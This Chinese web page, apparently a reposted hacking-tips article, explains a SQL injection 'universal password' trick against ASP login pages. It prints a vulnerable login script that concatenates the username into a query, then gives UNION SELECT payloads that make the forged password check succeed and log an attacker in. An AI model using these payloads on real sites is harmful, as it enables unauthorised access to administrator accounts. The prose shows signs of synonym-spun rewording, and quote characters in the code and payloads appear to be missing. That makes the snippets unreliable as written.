ASP注入全能登陆密码脚本之家guojizaixian - 娱乐之横扫全球

ASP注入全能登陆密码脚本之家guojizaixian

2019-02-02 11:54:29 | 作者: 昂熙 | 标签: 全能,程序代码,用户名 | 浏览: 8739

《黑客手册》样刊里边,oldjun说到一种新的全能登陆暗码。比方网上有许多这样的登陆验证代码:

  程序代码

  <%

  username=trim(Request.Form("username"))

  password=trim(Request.Form("password"))

  sql="Select * FROM admin Where user="&username&""

  Set rs=Server.CreateObject("adodb.recordset")

  rs.Open sql,conn,1,1

  if rs.eof then

  checksysUser=FALSE

  else

  passwd=trim(rs("pwd"))

  if passwd=password then

  Session("admin")=username

  checksysUser=TRUE

  else

  checksysUser=FALSE

  end if

  End if

  rs.close

  conn.close

  if checksysUser=true then

  Response.Redirect("main.asp")

  else

  errmsg="<font color=#FF0000><b>用户名输入有误,请从头输入!</b></font>"

  end if

  %>

  先在数据库中查询用户名对应的暗码,然后再和用户输入的暗码比照,导致or=or这样的全能登陆暗码失效。

  但假如在上面的程序中,用户名输入 程序代码

   UNION Select 1,1,1 FROM admin Where =

  ,暗码输入1,就可以登陆成功,原理很简单,就不多说了。

  趁便附上oldjun的句子:

  程序代码

   UNION Select 1,1,1 AS pwd FROM admin Where =

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表娱乐之横扫全球立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章